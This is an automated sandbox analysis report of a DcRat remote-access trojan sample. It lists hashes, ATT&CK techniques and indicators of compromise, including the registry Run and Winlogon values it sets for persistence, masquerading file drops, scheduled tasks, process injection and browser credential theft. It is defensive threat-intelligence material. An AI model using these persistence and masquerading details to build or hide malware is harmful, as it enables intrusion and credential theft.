dcrat | b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-01-2025 12:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AstralprivateDLL.exe.bin.exe
Size

65.7MB
MD5

c9f4668c97eb480751e1bbf6173fc4e1
SHA1

528deade2bc88cafc26f78f7c73490b66abdf370
SHA256

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
SHA512

dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
SSDEEP

196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY

Score

10^/10

dcrat discovery evasion execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\", \"C:\\Program Files\\dotnet\\winlogon.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\", \"C:\\Program Files\\dotnet\\winlogon.exe\", \"C:\\Users\\Public\\Desktop\\sihost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\", \"C:\\Program Files\\dotnet\\winlogon.exe\", \"C:\\Users\\Public\\Desktop\\sihost.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\", \"C:\\Program Files\\dotnet\\winlogon.exe\", \"C:\\Users\\Public\\Desktop\\sihost.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dwm.exe\", \"C:\\Windows\\schemas\\Provisioning\\explorer.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\", \"C:\\Program Files\\dotnet\\winlogon.exe\", \"C:\\Users\\Public\\Desktop\\sihost.exe\", \"C:\\Program Files (x86)\\Windows Portable Devices\\dwm.exe\", \"C:\\Windows\\schemas\\Provisioning\\explorer.exe\", \"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\""	ServerComponenthostMonitorDll.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1040	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4528	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4168	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	940	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4788	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3124	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3284	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	720	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2688	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3428	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1816	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4408	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	860	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2484	3528	schtasks.exe	92
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3496	3528	schtasks.exe	92

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 2120 created 3376	2120	twain_32.exe	56
PID 2120 created 3376	2120	twain_32.exe	56
PID 2120 created 3376	2120	twain_32.exe	56
PID 2120 created 3376	2120	twain_32.exe	56
PID 2120 created 3376	2120	twain_32.exe	56
PID 2120 created 3376	2120	twain_32.exe	56
PID 2620 created 3376	2620	updater.exe	56
PID 2620 created 3376	2620	updater.exe	56
PID 2620 created 3376	2620	updater.exe	56
PID 2620 created 3376	2620	updater.exe	56
PID 2620 created 3376	2620	updater.exe	56
PID 2620 created 3376	2620	updater.exe	56
PID 2620 created 3376	2620	updater.exe	56

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3744	powershell.exe
5496	powershell.exe
2108	powershell.exe
4892	powershell.exe
3300	powershell.exe
4256	powershell.exe
400	powershell.exe
5444	powershell.exe
4344	powershell.exe
4620	powershell.exe
4276	powershell.exe
4128	powershell.exe
3744	powershell.exe
1444	powershell.exe
3044	powershell.exe
3136	powershell.exe
2288	powershell.exe
3916	powershell.exe
2132	powershell.exe
3304	powershell.exe
2400	powershell.exe
2404	powershell.exe

Disables Task Manager via registry modification
evasion
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	ServerComponenthostMonitorDll.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	AstralprivateDLL.exe.bin.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	Astral private DLL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 5 IoCs

pid	Process
3804	Astral private DLL.exe
2120	twain_32.exe
4812	ServerComponenthostMonitorDll.exe
5512	ServerComponenthostMonitorDll.exe
2620	updater.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Users\\Public\\Desktop\\sihost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Users\\Public\\Desktop\\sihost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\schemas\\Provisioning\\explorer.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Mozilla Firefox\\fontdrvhost.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\dotnet\\winlogon.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\dotnet\\winlogon.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Windows Portable Devices\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\schemas\\Provisioning\\explorer.exe\""	ServerComponenthostMonitorDll.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
48	pastebin.com
49	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3256	cmd.exe
2868	powercfg.exe
3796	powercfg.exe
2152	powercfg.exe
1580	powercfg.exe
4916	powercfg.exe
5200	powercfg.exe
5240	cmd.exe
5264	powercfg.exe
5416	powercfg.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	\??\c:\Windows\System32\CSCA0CA6B898C874F42BB2ED23AC8118C1F.TMP	csc.exe
File created	\??\c:\Windows\System32\kpkopw.exe	csc.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2120 set thread context of 5956	2120	twain_32.exe	181
PID 2620 set thread context of 5164	2620	updater.exe	203
PID 2620 set thread context of 1684	2620	updater.exe	211
PID 2620 set thread context of 2708	2620	updater.exe	212

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\fontdrvhost.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Mozilla Firefox\5b884080fd4f94	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Google\Chrome\updater.exe	twain_32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files (x86)\Windows Portable Devices\dwm.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files (x86)\Windows Portable Devices\6cb0b6c459d5d3	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\dotnet\winlogon.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\dotnet\cc11b995f2a76d	ServerComponenthostMonitorDll.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\schemas\Provisioning\explorer.exe	ServerComponenthostMonitorDll.exe
File opened for modification	C:\Windows\schemas\Provisioning\explorer.exe	ServerComponenthostMonitorDll.exe
File created	C:\Windows\schemas\Provisioning\7a0fd90576e088	ServerComponenthostMonitorDll.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4204	sc.exe
972	sc.exe
3136	sc.exe
2136	sc.exe
5524	sc.exe
5280	sc.exe
5736	sc.exe
5828	sc.exe
1080	sc.exe
1924	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Astral private DLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AstralprivateDLL.exe.bin.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6024	PING.EXE

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A12D8F7C-D7F5-483B-B90C-BCC15D5FB2ED}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736772049"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	ServerComponenthostMonitorDll.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	Astral private DLL.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
3992	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6024	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4528	schtasks.exe
3284	schtasks.exe
720	schtasks.exe
1816	schtasks.exe
860	schtasks.exe
4788	schtasks.exe
228	schtasks.exe
4408	schtasks.exe
2484	schtasks.exe
1040	schtasks.exe
4168	schtasks.exe
940	schtasks.exe
3428	schtasks.exe
4740	schtasks.exe
3124	schtasks.exe
2212	schtasks.exe
2688	schtasks.exe
3496	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe
4812	ServerComponenthostMonitorDll.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4812	ServerComponenthostMonitorDll.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	4256	powershell.exe
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	5512	ServerComponenthostMonitorDll.exe
Token: SeDebugPrivilege	4276	powershell.exe
Token: SeShutdownPrivilege	2868	powercfg.exe
Token: SeCreatePagefilePrivilege	2868	powercfg.exe
Token: SeDebugPrivilege	5956	dialer.exe
Token: SeShutdownPrivilege	4916	powercfg.exe
Token: SeCreatePagefilePrivilege	4916	powercfg.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeShutdownPrivilege	3796	powercfg.exe
Token: SeCreatePagefilePrivilege	3796	powercfg.exe
Token: SeShutdownPrivilege	5200	powercfg.exe
Token: SeCreatePagefilePrivilege	5200	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3744	powershell.exe
Token: SeSecurityPrivilege	3744	powershell.exe
Token: SeTakeOwnershipPrivilege	3744	powershell.exe
Token: SeLoadDriverPrivilege	3744	powershell.exe
Token: SeSystemProfilePrivilege	3744	powershell.exe
Token: SeSystemtimePrivilege	3744	powershell.exe
Token: SeProfSingleProcessPrivilege	3744	powershell.exe
Token: SeIncBasePriorityPrivilege	3744	powershell.exe
Token: SeCreatePagefilePrivilege	3744	powershell.exe
Token: SeBackupPrivilege	3744	powershell.exe
